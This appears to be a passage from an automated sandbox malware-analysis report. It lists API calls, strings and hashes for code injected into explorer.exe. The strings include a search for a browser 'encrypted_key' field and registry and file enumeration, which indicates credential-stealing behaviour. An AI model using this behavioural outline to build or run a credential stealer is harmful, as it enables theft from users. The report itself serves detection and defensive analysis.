                                                                                                                                • Part of subcall function 008019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A98
                                                                                                                                • Part of subcall function 00801BC5: lstrlenW.KERNEL32(00000000,00000000,?,00802E75,PathToExe,00000000,00000000), ref: 00801BCC
                                                                                                                                • Part of subcall function 00801BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00802E75,PathToExe,00000000,00000000), ref: 00801BF0
                                                                                                                                • Part of subcall function 00801BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00802E75,PathToExe,00000000,00000000), ref: 00801C05
                                                                                                                                • Part of subcall function 00801BC5: lstrlenW.KERNEL32(00000000,?,00802E75,PathToExe,00000000,00000000), ref: 00801C1C
                                                                                                                                • Part of subcall function 00801AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00802E83,PathToExe,00000000,00000000), ref: 00801B16
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                              • String ID: PathToExe
                                                                                                                              • API String ID: 1799103994-1982016430
                                                                                                                              • Opcode ID: 9f15ffec0575f3f64ca5a177f224e000de35f3b676feb41a18e23b06cf7fba9d
                                                                                                                              • Instruction ID: 258bc06122be11f93dfcbf14fdee882063fb7613fbafdb44ac8f1a427a6f287f
                                                                                                                              • Opcode Fuzzy Hash: 9f15ffec0575f3f64ca5a177f224e000de35f3b676feb41a18e23b06cf7fba9d
                                                                                                                              • Instruction Fuzzy Hash: 30318D31604311AFDB65AF25CC1986FBAA9FFC4360B04452CF855C72C1EE74C915CBA2

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 782 80a67c-80a692 783 80a6c1-80a6c4 782->783 784 80a694-80a6bf _alldiv _allmul 782->784 785 80a6c7-80a6d2 call 80a33b 783->785 784->785 788 80a6f0-80a6fb SetEndOfFile 785->788 789 80a6d4-80a6df 785->789 791 80a6fd-80a708 788->791 792 80a71e 788->792 790 80a6e4-80a6ee call 80a1c6 789->790 793 80a722-80a726 790->793 791->792 799 80a70a-80a71c 791->799 792->793 796 80a728-80a72b 793->796 797 80a73a-80a740 793->797 796->797 800 80a72d 796->800 799->790 801 80a734-80a737 800->801 802 80a72f-80a732 800->802 801->797 802->797 802->801
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File_alldiv_allmul
                                                                                                                              • String ID: winTruncate1$winTruncate2
                                                                                                                              • API String ID: 3568847005-470713972
                                                                                                                              • Opcode ID: 207ffb89e1e7c29007028d62d1cf95dbf581de56c69cf24a0f3c3406db1183d9
                                                                                                                              • Instruction ID: 6ddcbf54ad33976a0694eb4fbbb2b82e9185c0d0d8c286aed2c23369b444110c
                                                                                                                              • Opcode Fuzzy Hash: 207ffb89e1e7c29007028d62d1cf95dbf581de56c69cf24a0f3c3406db1183d9
                                                                                                                              • Instruction Fuzzy Hash: CF21AC76201200ABCB988E2DCC86E6777A9FF84311F15C169FD54DB296DA35DC00CBA2
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • wsprintfW.USER32 ref: 00804AA2
                                                                                                                              • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00804AC7
                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 00804AD4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                              • String ID: %s\%08x$Software
                                                                                                                              • API String ID: 1800864259-1658101971
                                                                                                                              • Opcode ID: 69378b56749ca1f828c17b133918e40e6eba4c55d3e805facbe797ae9908bde9
                                                                                                                              • Instruction ID: 8a1db660c7767a3b238d7b5d316805bc425b15ef0b382c80e6c5d6b10eef4c69
                                                                                                                              • Opcode Fuzzy Hash: 69378b56749ca1f828c17b133918e40e6eba4c55d3e805facbe797ae9908bde9
                                                                                                                              • Instruction Fuzzy Hash: 5401F271A40108BFEB189F95DC8ADBF7BADFB41355F80016EFA05E3181EAB06E509661
                                                                                                                              APIs
                                                                                                                              • _alloca_probe.NTDLL ref: 0080431C
                                                                                                                              • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00804335
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00804363
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 008043C8
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994
                                                                                                                                • Part of subcall function 0080418A: wsprintfW.USER32 ref: 00804212
                                                                                                                                • Part of subcall function 00801011: GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
                                                                                                                                • Part of subcall function 00801011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 008043B9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 801677237-0
                                                                                                                              • Opcode ID: 4c9684997a8280f7b574007940ac99aa2e58a43ab9938b56d10997de3fd96cdd
                                                                                                                              • Instruction ID: 6dfb6c6ca58c19f4a4d5bff3613fe3edaef3810e71f75a7a57835a4b5d8ac175
                                                                                                                              • Opcode Fuzzy Hash: 4c9684997a8280f7b574007940ac99aa2e58a43ab9938b56d10997de3fd96cdd
                                                                                                                              • Instruction Fuzzy Hash: 67119DB1104201AFE7559B20CC49DBBB7ECFB88354F004A2EB989D2190EB749D488A62
                                                                                                                              APIs
                                                                                                                              • memset.NTDLL ref: 0080B8D5
                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0080B96F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFilememset
                                                                                                                              • String ID: psow$winOpen
                                                                                                                              • API String ID: 2416746761-4101858489
                                                                                                                              • Opcode ID: 657f29ad0a1f7e172d6136d75aa7dde9f3fb2e9528116b8e9c74fc76299a3573
                                                                                                                              • Instruction ID: e8a6be5e0ea20162045c9772553eac76f2c76f35ac4a725bd7f5771da44ef354
                                                                                                                              • Opcode Fuzzy Hash: 657f29ad0a1f7e172d6136d75aa7dde9f3fb2e9528116b8e9c74fc76299a3573
                                                                                                                              • Instruction Fuzzy Hash: 66715871A057069FDB90DF28CC81B1ABBE0FF88324F144A29F964D72D1E774D9548B92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000867000.00000040.80000000.00040000.00000000.sdmp, Offset: 00867000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_867000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b5d9120862952903f83a450c738e7142f4e95cb7b70daf0630348500ce152903
                                                                                                                              • Instruction ID: 6d313518caf77c5d76ba111eae138a82214aae64b0af4a4756bc7ecf3510acf5
                                                                                                                              • Opcode Fuzzy Hash: b5d9120862952903f83a450c738e7142f4e95cb7b70daf0630348500ce152903
                                                                                                                              • Instruction Fuzzy Hash: 91A16B729143565BD7218F78CDC46A07BA8FB52324B2E06ADC5E1CB3C2EB70580BC755
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A1E
                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A3C
                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A75
                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A98
                                                                                                                                • Part of subcall function 00801011: GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
                                                                                                                                • Part of subcall function 00801011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 217796345-0
                                                                                                                              • Opcode ID: 3d1187306d79bef9454e2c39d5e56c9160af669024289975bbe11b551d3d76a6
                                                                                                                              • Instruction ID: 240b28260bbe54a30e6bfdf48b6f9bb0edbc4af4f616d4ccd87d6ccce4b0aca7
                                                                                                                              • Opcode Fuzzy Hash: 3d1187306d79bef9454e2c39d5e56c9160af669024289975bbe11b551d3d76a6
                                                                                                                              • Instruction Fuzzy Hash: BF21AD72306351AFEB648A218D48F3BB7E9FBC8769F000A2DF985D2180E624CD418622
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00801ED5
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00801F0C
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00801F98
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994
                                                                                                                              • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00801F82
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1077800024-0
                                                                                                                              • Opcode ID: c4728dfa3212deafacc0739b55bf59068ca360cf118efa715bf59a00ab45fdc2
                                                                                                                              • Instruction ID: f1d535f5d21e0bf9e493a8dc6f86956306890319dd2f09c80d546f08960635ae
                                                                                                                              • Opcode Fuzzy Hash: c4728dfa3212deafacc0739b55bf59068ca360cf118efa715bf59a00ab45fdc2
                                                                                                                              • Instruction Fuzzy Hash: CF217C71208301AFDB459B25CC48D2BBAEDFF88364F40492DF899D2190EF35C9159B22
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00803E1E,00000000,?,00803FA8), ref: 00801C46
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00803FA8), ref: 00801C56
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00803FA8), ref: 00801C91
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00803FA8), ref: 00801C76
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2517252058-0
                                                                                                                              • Opcode ID: 67cd949d3ba6dabbb685df347d58fd5ca3336572a0e179925966cf71aa853329
                                                                                                                              • Instruction ID: 67dfa92ca5687e2256edd7b48ffcd285559447f5777a81ce921b7b36f29fecc8
                                                                                                                              • Opcode Fuzzy Hash: 67cd949d3ba6dabbb685df347d58fd5ca3336572a0e179925966cf71aa853329
                                                                                                                              • Instruction Fuzzy Hash: 63F0F431200718BBD6601B29DC8CE7B7A5CFB427F6F110318F505D31D0EB169C114171
                                                                                                                              APIs
                                                                                                                              • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00803E30,00000000,00000000,?,00803FA8), ref: 00802FC1
                                                                                                                              • lstrlen.KERNEL32("encrypted_key":",?,00803FA8), ref: 00802FCE
                                                                                                                              • StrStrIA.SHLWAPI("encrypted_key":",0085692C,?,00803FA8), ref: 00802FDD
                                                                                                                                • Part of subcall function 0080190B: lstrlen.KERNEL32(?,?,?,?,00000000,00802783), ref: 0080192B
                                                                                                                                • Part of subcall function 0080190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00802783), ref: 00801930
                                                                                                                                • Part of subcall function 0080190B: lstrcat.KERNEL32(00000000,?), ref: 00801946
                                                                                                                                • Part of subcall function 0080190B: lstrcat.KERNEL32(00000000,00000000), ref: 0080194A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                                              • String ID: "encrypted_key":"
                                                                                                                              • API String ID: 493641738-877455259
                                                                                                                              • Opcode ID: e45d8f7b6e97004d1f960e168245a3a458d20876c1b7b270efdb8acfdbf0a988
                                                                                                                              • Instruction ID: 8170825c69fcb3c4a8563cd8275dfef1733bd26b787404bcda586ea7f06fa390
                                                                                                                              • Opcode Fuzzy Hash: e45d8f7b6e97004d1f960e168245a3a458d20876c1b7b270efdb8acfdbf0a988
                                                                                                                              • Instruction Fuzzy Hash: 4CE02B22745B351FC7F26BB51C488577E1CFE026523880064F601D3152FE958805C2A0
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0080BB40
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID: winDelete
                                                                                                                              • API String ID: 3188754299-3936022152
                                                                                                                              • Opcode ID: 3e803d40393ce7e2c2e45eaa15409980280bc3f2ee1c85caa2355fe82c59fc01
                                                                                                                              • Instruction ID: 5ea4dddc158f1fec6ad502ed20f4bfcc599c2d2327c8ca0a85c75a6730a9758f
                                                                                                                              • Opcode Fuzzy Hash: 3e803d40393ce7e2c2e45eaa15409980280bc3f2ee1c85caa2355fe82c59fc01
                                                                                                                              • Instruction Fuzzy Hash: 2E11AD31B00208EBDB91ABA98C6697D7775FF91771F244125E812E72C9EB308D029792
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801011: GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
                                                                                                                                • Part of subcall function 00801011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00802EE4
                                                                                                                              • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00802F54
                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 00802F62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1066184869-0
                                                                                                                              • Opcode ID: a9d15d285dddfe8b2153919f866b8aa0a3d7dbe88d53a5c02ed76ff24a2c3735
                                                                                                                              • Instruction ID: 6f1e36f00550b913f5bc3685f384833cdee73c180c2b55fec43e115496b9d7bb
                                                                                                                              • Opcode Fuzzy Hash: a9d15d285dddfe8b2153919f866b8aa0a3d7dbe88d53a5c02ed76ff24a2c3735
                                                                                                                              • Instruction Fuzzy Hash: 7E018F31204251AFCA559B25DC0896FBBA9FFC43A1F00442DF949D21D1DE358855EBA2
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitInitializeProcessUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4175140541-0
                                                                                                                              • Opcode ID: 678b8df6f6318a2cc11b4998b082baba99a8c63cdc3792decea8e81b5dc29021
                                                                                                                              • Instruction ID: 2ad1fdfb90b204c78df6a5acc6eec09126e3f167a120d8a1bb1a98c98e7e8457
                                                                                                                              • Opcode Fuzzy Hash: 678b8df6f6318a2cc11b4998b082baba99a8c63cdc3792decea8e81b5dc29021
                                                                                                                              • Instruction Fuzzy Hash: 08C04C703C43008BE6D02BE05C0D7193614FF00713F405004F309C60D1EA5444108623
                                                                                                                              APIs
                                                                                                                              • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00809FF8
                                                                                                                              Strings
                                                                                                                              • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0080A00E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHeap
                                                                                                                              • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                              • API String ID: 10892065-982776804
                                                                                                                              • Opcode ID: 377d75548fc30d257fcf2c9e16c212d06f4118f23ff5c504d51a0f8b25a76d2d
                                                                                                                              • Instruction ID: 031469371a7da70787e159e241ef6a2c90d390608331c51ab338e32f8b9b4dc4
                                                                                                                              • Opcode Fuzzy Hash: 377d75548fc30d257fcf2c9e16c212d06f4118f23ff5c504d51a0f8b25a76d2d
                                                                                                                              • Instruction Fuzzy Hash: 94F02B72704746FAE7701A94EC88F67679CFB94B8AF154819F985D22C2EAB1AC008331
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00802E83,PathToExe,00000000,00000000), ref: 00801B16
                                                                                                                                • Part of subcall function 00801011: GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
                                                                                                                                • Part of subcall function 00801011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027
                                                                                                                                • Part of subcall function 008019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A1E
                                                                                                                                • Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A3C
                                                                                                                                • Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A75
                                                                                                                                • Part of subcall function 008019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A98
                                                                                                                              Strings
                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00801B40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                              • API String ID: 2162223993-2036018995
                                                                                                                              • Opcode ID: a37e7ebdb02b6e5139b4c63c9e6d1f9af9138429a2a01fc635d870305bbfa10b
                                                                                                                              • Instruction ID: cddcfd992e03c520e5feb65d14fb740d2b7a8aa449740866be5b9a505dfdf101
                                                                                                                              • Opcode Fuzzy Hash: a37e7ebdb02b6e5139b4c63c9e6d1f9af9138429a2a01fc635d870305bbfa10b
                                                                                                                              • Instruction Fuzzy Hash: 93F02432700B4827DE512A2ACC9CE373A8EFBD23B77070029F559C3382EE166C405265
                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0080A35F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID: winSeekFile
                                                                                                                              • API String ID: 973152223-3168307952
                                                                                                                              • Opcode ID: ea1960bab4c38a36d144ff0d58e0b18399b46f4e5bbf3bd83a87a8b97974d361
                                                                                                                              • Instruction ID: 2e03af08b20c263e2928e7a9f0d7efc837ac86695bc5b9719cc61fdb4eb59f6d
                                                                                                                              • Opcode Fuzzy Hash: ea1960bab4c38a36d144ff0d58e0b18399b46f4e5bbf3bd83a87a8b97974d361
                                                                                                                              • Instruction Fuzzy Hash: 22F0BE30615304AFEB569F64DC059BB77AAFB44321F15C369F862DA3D0EA70DD0096A2
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(04F50000,00000000,?), ref: 00809EB5
                                                                                                                              Strings
                                                                                                                              • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00809ECD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                              • API String ID: 1279760036-667713680
                                                                                                                              • Opcode ID: 9ab2b3de27c5e182abba40000de246fc0cc7182cfc645fe5310205e9b464d8bf
                                                                                                                              • Instruction ID: 18455bc9379318dbb956e2a7086321b0c4261d25d2e8c40e90d5c9c53d5eb8f0
                                                                                                                              • Opcode Fuzzy Hash: 9ab2b3de27c5e182abba40000de246fc0cc7182cfc645fe5310205e9b464d8bf
                                                                                                                              • Instruction Fuzzy Hash: 75E0CD33A046107BC5131784AC05F1F7769FB94F51F064055F940D23A1C6B49C01C7A2
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(04F50000,00000000,?), ref: 00809EF8
                                                                                                                              Strings
                                                                                                                              • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00809F0E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                              • API String ID: 3298025750-4030396798
                                                                                                                              • Opcode ID: 91cd98b367fd7baa781b1cde857cb3ddb52338dbbf58f2a7e7ebbdd24c262e61
                                                                                                                              • Instruction ID: 474d3262c712f6600e5d951f80988a426a083af83a047c47dc6ed99bb75198a4
                                                                                                                              • Opcode Fuzzy Hash: 91cd98b367fd7baa781b1cde857cb3ddb52338dbbf58f2a7e7ebbdd24c262e61
                                                                                                                              • Instruction Fuzzy Hash: 7DD0C2322082027BC6011B94EC06F2B7739FB90B01F090008F100D11F7DBA46440AB62
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00801B8F
                                                                                                                              Memory Dump Source
